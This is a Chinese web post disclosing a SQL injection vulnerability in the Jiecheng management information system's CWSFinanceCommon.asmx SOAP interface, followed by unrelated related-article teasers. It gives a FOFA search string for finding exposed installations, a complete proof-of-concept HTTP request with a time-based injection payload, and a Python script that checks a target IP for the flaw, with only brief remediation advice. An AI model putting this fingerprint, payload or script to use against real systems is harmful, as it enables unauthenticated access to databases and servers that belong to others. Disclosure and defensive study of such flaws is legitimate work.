捷诚管理信息系统 SQL注入漏洞

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、产品介绍

捷诚管理信息系统是一款功能全面,可以支持自营、联营到外柜租赁的管理,其自身带工作流管理工具,能够帮助企业有效的开展内部审批工作。

二、漏洞描述

该系统CWSFinanceCommon.asmx接口存在SQL注入漏洞。未经身份认证的攻击者可以通过该漏洞获取数据库敏感信息,深入利用可获取服务器权限。

三、fofa语法

body="/Scripts/EnjoyMsg.js"

 四、漏洞复现

重放

poc

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetOSpById xmlns="http://tempuri.org/"><sId>1';waitfor delay '0:0:5'--+</sId></GetOSpById></soap:Body>
</soap:Envelope>

 python检测脚本

import timeimport requestsdef verify(ip):url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx'headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','Connection': 'close','Content-Length': '369','Accept': '*/*','Accept-Language': 'en','Content-Type': 'text/xml; charset=utf-8','Accept-Encoding': 'gzip',}payload = '''<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetOSpById xmlns="http://tempuri.org/"><sId>1';waitfor delay '0:0:5'--+</sId></GetOSpById></soap:Body></soap:Envelope>'''try:start_time = time.time()response = requests.post(url, headers=headers, data=payload,verify=False)end_time = time.time()res_time = end_time - start_time# 验证成功输出相关信息if response.status_code == 200 and res_time > 5 and res_time < 8:print(f"{ip}存在捷诚管理信息系统SQL注入漏洞!!!")except Exception as e:passif __name__ == '__main__':self = input('请输入目标主机IP地址:')verify(self)

 使用方法

五、修复建议

尽快修复漏洞,更新系统

设置访问控制策略

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/210890.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

竞赛选题 题目:垃圾邮件(短信)分类 算法实现 机器学习 深度学习 开题

竞赛选题 题目:垃圾邮件(短信)分类 算法实现 机器学习 深度学习 开题

文章目录 1 前言2 垃圾短信/邮件 分类算法 原理2.1 常用的分类器 - 贝叶斯分类器 3 数据集介绍4 数据预处理5 特征提取6 训练分类器7 综合测试结果8 其他模型方法9 最后 1 前言 &#x1f525; 优质竞赛项目系列&#xff0c;今天要分享的是 基于机器学习的垃圾邮件分类 该项目…
阅读更多...
kettle处理数据示例

kettle处理数据示例

阅读更多...
纯干货之阿里云云计算认证,赶紧收藏!

纯干货之阿里云云计算认证,赶紧收藏!

一、阿里云&云计算认证&#xff0c;引领未来 想必大家对阿里这个企业都很熟悉&#xff0c;我们平时常用的支付宝、淘宝、钉钉、飞猪等等都是阿里的产业&#xff0c;用在我们生活的各个方面。 但大家可能不知道的是&#xff0c;阿里云的云计算技术也是领先全国甚至全球的&…
阅读更多...
私域流量该如何运营和布局?提供高质量的内容和服务

私域流量该如何运营和布局?提供高质量的内容和服务

私域流量的运营和布局需要建立自己的品牌形象和口碑&#xff0c;提供高质量的内容和服务&#xff0c;利用裂变式营销扩大用户规模&#xff0c;数据化运营提高用户转化率和忠诚度&#xff0c;建立会员体系增加用户粘性和参与度&#xff0c;社群运营增加用户互动和粘性。同时需要…
阅读更多...
springboot+jsp学生健康体检档案评估系统_ju8pu

springboot+jsp学生健康体检档案评估系统_ju8pu

本基于Java的学生健康档案管理信息系统采用Java语言来进行开发&#xff0c;从角色上分为管理员&#xff0c;辅导员&#xff0c;档案管理员和学生几个具体功能如下 &#xff08;1&#xff09;管理员部分功能主要包括&#xff0c;个人中心&#xff0c;档案员管理&#xff0c;辅…
阅读更多...
(C++)反转字符串中的单词

(C++)反转字符串中的单词

愿所有美好如期而遇 力扣&#xff08;LeetCode&#xff09;官网 - 全球极客挚爱的技术成长平台备战技术面试&#xff1f;力扣提供海量技术面试资源&#xff0c;帮助你高效提升编程技能&#xff0c;轻松拿下世界 IT 名企 Dream Offer。https://leetcode.cn/problems/reverse-w…
阅读更多...
为IP地址申请SSL证书

为IP地址申请SSL证书

SSL&#xff08;Secure Sockets Layer&#xff09;是一种网络协议&#xff0c;用于在浏览器与服务器之间建立安全、加密的连接。SSL证书是用于证明您的网站身份并启用HTTPS&#xff08;超文本传输安全协议&#xff09;的安全文件。这种协议可以确保用户与您的网站之间的所有通信…
阅读更多...
OpenAI 画图工具 DALL E 相关分享

OpenAI 画图工具 DALL E 相关分享

原文&#xff1a; https://openaigptguide.com/openai-dall-e-painting-guide/ 使用OpenAI的绘图工具DALLE非常简单&#xff0c;用户只需在OpenAI官网完成注册&#xff0c;下载并安装相应的软件&#xff0c;注册账号并登录后&#xff0c;就可以开始使用DALLE进行绘图了。当然&…
阅读更多...
浅析jdk8所包含的主要特性

浅析jdk8所包含的主要特性

至今Java 8仍然是许多开发者首选的JDK版本&#xff0c;Java 8的生态系统非常成熟&#xff0c;许多库和框架都已经适配了Java 8。迁移到新的Java版本可能需要重新评估和调整现有的依赖关系&#xff0c;这对于一些大型项目可能是一个挑战。那么Java 8有哪些特性让多数开发者钟爱呢…
阅读更多...
maxwell采集数据到kafka报错

maxwell采集数据到kafka报错

问题&#xff1a; 启动maxwell后出现数据更新后就出现以下报错。 13:29:14,727 ERROR MaxwellKafkaProducer - TimeoutException Position[BinlogPosition[binlog.000002:12215591], lastHeartbeat1700717043797] -- maxWellData: medical:consultation:[(id,212)] 13:29:14,7…
阅读更多...
Leetcode—14.最长公共前缀【简单】

Leetcode—14.最长公共前缀【简单】

2023每日刷题&#xff08;三十八&#xff09; Leetcode—14.最长公共前缀 实现代码 char* longestCommonPrefix(char** strs, int strsSize) {char *ans (char *)malloc(sizeof(char) * 203);char *p ans;int len 1, i 1;int flag 0;if(strsSize 0) {return "&quo…
阅读更多...
手把手教你如何提交App备案

手把手教你如何提交App备案

手把手教你如何提交App备案 随着工信部出台了《工业和信息化部关于开展移动互联网应用程序备案工作的通知》对于我司所使用的到的移动应用APP就需要做app备案&#xff0c;今天用游戏app手把手教你如何提交App备案。 基本操作流程 运营、市场 提供需要备案的APP名称、主体、A…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023